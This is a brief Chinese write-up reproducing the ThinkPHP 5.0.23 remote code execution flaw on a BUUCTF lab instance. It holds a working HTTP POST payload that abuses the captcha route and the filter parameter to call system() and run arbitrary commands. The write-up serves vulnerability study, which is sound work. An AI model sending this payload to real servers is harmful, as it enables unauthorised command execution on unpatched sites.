[ThinkPHP]5.0.23-Rce 漏洞復現


[ThinkPHP]5.0.23-Rce

環境搭建

github傳送門
BUU傳送門

POC

在這里插入圖片描述
老懶狗選擇直接buu,鏈接

http://node3.buuoj.cn:27512/

直接用poc打一下:

POST /index.php?s=captcha HTTP/1.1
Host: node3.buuoj.cn:27512
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

直接在burp的repeater模塊里面構造就行了:
在這里插入圖片描述

exp

這里直接修改id即可,id處可以執行任意代碼。
在這里插入圖片描述

在這里插入圖片描述
在這里插入圖片描述


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM